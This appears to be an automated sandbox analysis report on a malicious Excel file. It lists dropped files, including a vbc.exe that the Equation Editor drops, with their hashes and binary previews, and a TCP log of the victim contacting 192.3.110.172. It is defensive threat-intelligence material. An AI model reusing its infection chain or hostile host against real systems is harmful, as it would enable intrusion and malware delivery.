                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                              Category:dropped
                                              Size (bytes):11303
                                              Entropy (8bit):7.909402464702408
                                              Encrypted:false
                                              SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                              MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                              SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                              SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                              SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                              Malicious:false
                                              Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EE39EA45.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 737 x 456, 8-bit/color RGB, non-interlaced
                                              Category:dropped
                                              Size (bytes):83904
                                              Entropy (8bit):7.986000888791215
                                              Encrypted:false
                                              SSDEEP:1536:xNzYthYR7Iu3TjzBH8lXtvmNy2k8KYpNNNQ64nBLEMoknbRVmnN6:xNzUGxDjeOs2kSNSBh24
                                              MD5:9F9A7311810407794A153B7C74AED720
                                              SHA1:EDEE8AE29407870DB468F9B23D8C171FBB0AE41C
                                              SHA-256:000586368A635172F65B169B41B993F69B5C3181372862258DFAD6F9449F16CD
                                              SHA-512:27FC1C21B8CB81607E28A55A32ED895DF16943E9D044C80BEC96C90D6D805999D4E2E5D4EFDE2AA06DB0F46805900B4F75DFC69B58614143EBF27908B79DDA42
                                              Malicious:false
                                              Preview: .PNG........IHDR.............oi......IDATx..u|........@ .@..[.H.5...<....R.8.P...b-....[.!...M..1{on.MB.@...{........r..9s.QTUE".H$..$.a._.@".H$..$...".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...2.D".H$..Q$..D".dG..".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...... y.P....D".H..TU}..RF..jRRR...A.1y..Eyj..d$Ne.U..x..f...,.3.......^.m.ga<r...Q..Y..&....43|A...~...b...l..&........d../C..... ...sN....;.IFXX<..F.z$..D".dG..E..1.fR.%..= 6((W..5.m....YsM.!.....v..r.*....\Y..h.N.M.v....{.%...........gb&.<..7/..).X..(\.......0k......k.d2..KI;...O.X..]j.G..BB(U..........`.zU@=t$...S........N...6..a`..t...z.v*:.....M......YUe.N....TI.*..]NQ.<..vm....o....|yt:......P..d.]....bE.zr.....*UJ.y.b....5...gg..?..;pr..V-..U.66.h...Y.......q_t:.."M..x.7...4Y...aa.@qw.I..=.sgC.....pa.!O.Q.....%.f..P..~.uk...8.......-R....5m.I..S.BCC....9r...O.<8u....Q$..E!).`.6.7V.k+WF^...y...p......5.......\)~Y.7m....../.P._^.0W@.....[....<.R..
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F5161A2C.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):68702
                                              Entropy (8bit):7.960564589117156
                                              Encrypted:false
                                              SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                              MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                              SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                              SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                              SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                              Malicious:false
                                              Preview: .PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.*Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y..*.v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..|..8...
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FADACEE0.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                              Category:dropped
                                              Size (bytes):11303
                                              Entropy (8bit):7.909402464702408
                                              Encrypted:false
                                              SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                              MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                              SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                              SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                              SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                              Malicious:false
                                              Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                              C:\Users\user\AppData\Local\Temp\5xppu3pv9xau06i1l7h
                                              Process:C:\Users\Public\vbc.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):215509
                                              Entropy (8bit):7.993007159667604
                                              Encrypted:true
                                              SSDEEP:6144:hKN+7tjT1EoU/usg+EyYhHSP57+UsvQv3QjQhClksFCvB:CitHGhGsg+EpxY+UsYSkvB
                                              MD5:09E26957074F7239C0B27A193FD6CAD9
                                              SHA1:91B1CC7594C2800DA6A3FBEFB374DBEFC0B61869
                                              SHA-256:E8AC32511C468DB2F12B50DDE50345166EA845907E661091F2E64FA1EBE0D783
                                              SHA-512:A0408E836B50A0E7EFE1A1BC0D2A521275A37B25C7A72EDEBFA07EBBD7A453D90BBE7D28DFE3D7A7AC88D3E3A57E030E4986DC43DF378851BDED16D80BF9C55B
                                              Malicious:false
                                              Preview: ".u.So.r..SD..9....t.R.f&7......*.e.....%c...2....,..........NQ.~.!..ej.f....0.K.v.j.......:(1P.Us...dB.#.].&d0..J.I....%...x*g..S...(.a.#.. .k/..Up.).N5.d...]..4.$"....f*...%W.....{.'...o..Qd....M.....7.^.... }..5..$..g.w.A..y .P5..a.|."...v......o.r...r)]..... T.@./.C....*.ea....%c...2....,.........N...~!.t....s..3...?......0.[..k}.O.+.....p...W3...ka|.I....%..Zz..}.........\Dx...h......dw.*....o. ...P`6.>~.&+.%W.v.....'.."..Qd....d..xQjV..z.;. }..5..T..l.w....y`.P8..a8|.N"....v...b..o.r.5~.rI].....7T...p.C....*.e.....%c...2....,.........N...~!.t....s..3...?......0.[..k}.O.+.....p...W3...ka|.I....%..Zz..}.........\Dx...h......dw.*....o. ...P`6..f*...%W. .....'..c"..Qd....d..xQjV.^z... }..5..T..l.w....y`.P8..a8|.N"....v...b..o.r.5~.rI].....7T...p.C....*.e.....%c...2....,.........N...~!.t....s..3...?......0.[..k}.O.+.....p...W3...ka|.I....%..Zz..}.........\Dx...h......dw.*....o. ...P`6..f*...%W. .....'..c"..Qd....d..xQjV.^z... }..5..T..l.w
                                              C:\Users\user\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dll
                                              Process:C:\Users\Public\vbc.exe
                                              File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):108032
                                              Entropy (8bit):6.399774938239077
                                              Encrypted:false
                                              SSDEEP:1536:MOFgGAexpLuHJsu05OpmubCPMG9zpEENfuJSPRHKarriUCy3WklS9ncobUfs/MdL:hFgGA8uq9Bn1bJCyxlSrbMdyqWU
                                              MD5:9DCFA8231F1896CA0D48D53FB116841D
                                              SHA1:13F92A4AF7931B2AABD918D6D3CF4589E316331B
                                              SHA-256:6E1D37A9909F1774DB945F4427800E4D0B821FDCA41598F12DBA41B59FA3C901
                                              SHA-512:75D3A9FF265971C659444BD13FC28F90A77E0CE709A34A6C46F9EC75FD7F337DF5DBF5EC74B4129890B4B724E40AA10863F6D8D7E74A747CE7C5311F97513D09
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Joe Sandbox View:
                                              • Filename: dtMT5xGa54.exe, Detection: malicious, Browse
                                              • Filename: TransportLabel_1189160070.xlsx, Detection: malicious, Browse
                                              Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....wfa...........!....."...........*..............................................................................<...L...........................................................................h]..H...........p... ............................text....!.......".................. ..`.rdata...V...@...X...&..............@..@.data....C.......&...~..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\Desktop\~$Sajeeb09908976745344567.xlsx
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):165
                                              Entropy (8bit):1.4377382811115937
                                              Encrypted:false
                                              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                              MD5:797869BB881CFBCDAC2064F92B26E46F
                                              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                              Malicious:true
                                              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              C:\Users\Public\vbc.exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Category:dropped
                                              Size (bytes):290617
                                              Entropy (8bit):7.9395134807721
                                              Encrypted:false
                                              SSDEEP:6144:wBlL/c7HU+ICkZsFE03JDT37iHxU1D/RmNOZeXBiFkJTstHJXd0mU:Ce7HUDCysO0dLiWDc8ZHKmHImU
                                              MD5:0031A23B4BB6ABCDCCC5F8122DE5FCB5
                                              SHA1:BE50CDBB0AF4C77229E3DE0EC7F34088AAE64DC2
                                              SHA-256:2FFBB436257F6F348FADE42E94DF5737AB8B9D9848A220206992C52D917A7B5E
                                              SHA-512:EED60BDA2D0A5FB02F823DB8CAF57D136DC6D003F49CA7D3CB6A620DCB1CF4AD4E52C6B9A40AEFE9126F9E137776AE23D78A2648F5609FA3D69989AB3D185CC2
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 36%
                                              Joe Sandbox View:
                                              • Filename: TransportLabel_1189160070.xlsx, Detection: malicious, Browse
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF.rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@..........................................................................t.......................................................................................p..|............................text....Z.......\.................. ..`.rdata.......p.......`..............@..@.data...8............r..............@....ndata.......P...........................rsrc................x..............@..@................................................................................................................................................................................................................................................................................................................................................................

                                              Static File Info

                                              General

                                              File type:CDFV2 Encrypted
                                              Entropy (8bit):7.9731887479499495
                                              TrID:
                                              • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                              File name:Sajeeb09908976745344567.xlsx
                                              File size:328616
                                              MD5:ac493c2681477e3b56acbb570b8e41d9
                                              SHA1:2d9019b6c2f57c6360b155957cb542ae61bbf728
                                              SHA256:9efaa722d6e9df7c6628df6d1f49d14d858b60782db11c3f1e9b5037803b290b
                                              SHA512:a26f5e7baebdf77f54a9e8f1b109b4a9ac2ed74f33fca08f4014b1e185e87d446d2638dd4dff3ec67f229df3ad0bb592549e999851ea75fbd864e3c1df0fe024
                                              SSDEEP:6144:nPUVRB6666666rBkkoL6666664BoW303lddzlBGJOvZT7oz7Dqfd2QCwHPPQRUk2:PqH666666eBkxL6666664BoWE3lPcGZb
                                              File Content Preview:........................>......................................................................................................................................................................................................................................

                                              File Icon

                                              Icon Hash:e4e2aa8aa4b4bcb4

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 13, 2021 19:03:15.477302074 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:15.650738955 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:15.651010036 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:15.651736975 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:15.826574087 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:15.826603889 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:15.826620102 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:15.826637030 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:15.826730013 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:15.826781988 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.003546000 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.003576994 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.003595114 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.003611088 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.003627062 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.003642082 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.003657103 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.003671885 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.003727913 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.003760099 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.177303076 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.177356005 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.177369118 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.177386045 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.177397966 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.177409887 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.177424908 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.177438021 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.177526951 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.177545071 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.177556992 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.177573919 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.177587986 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.177607059 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.177623034 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.177639008 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.177644014 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.177695990 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.177700996 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.177704096 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.177706957 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.177710056 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.177712917 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.180073977 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.351347923 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351380110 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351392031 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351404905 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351421118 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351432085 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351444006 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351464987 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351476908 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351490021 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351500988 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351521015 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351533890 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351543903 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351560116 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351576090 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351592064 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351603985 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351615906 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351627111 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351639032 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351655006 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351666927 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351670027 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.351679087 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351691008 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351705074 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351707935 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.351715088 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.351716995 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351728916 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351744890 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351759911 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.351769924 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.351783037 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.351883888 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.354324102 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.525357962 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.525402069 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.525430918 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.525460958 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.525487900 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.525513887 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.525540113 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.525566101 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.525592089 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.525639057 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.525664091 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.525667906 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.525695086 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.525715113 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.525721073 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.525722027 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.525724888 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.525743961 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.525747061 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.525748968 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.525768995 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.525774956 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.525798082 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.525801897 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.525827885 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.525829077 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.525847912 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.525861025 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.525882006 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.525890112 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.525913000 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.525916100 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.525942087 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.525964022 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.525968075 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.525993109 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.526005983 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.526019096 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.526021004 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.526025057 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.526027918 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.526043892 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.526077032 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.526077986 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.526082993 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.526115894 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.527736902 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.527761936 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.527775049 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.527786016 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.527807951 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.527826071 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.527842999 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.527862072 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.527877092 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.527893066 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.527908087 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.527923107 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.527937889 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.527946949 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.527952909 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.527971029 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.527985096 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.527987003 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.527998924 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.528002977 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.528002977 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.528007030 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.528009892 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.528017998 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.528023005 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.528033018 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.528040886 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.528047085 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.528062105 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.528070927 CEST4916580192.168.2.22192.3.110.172
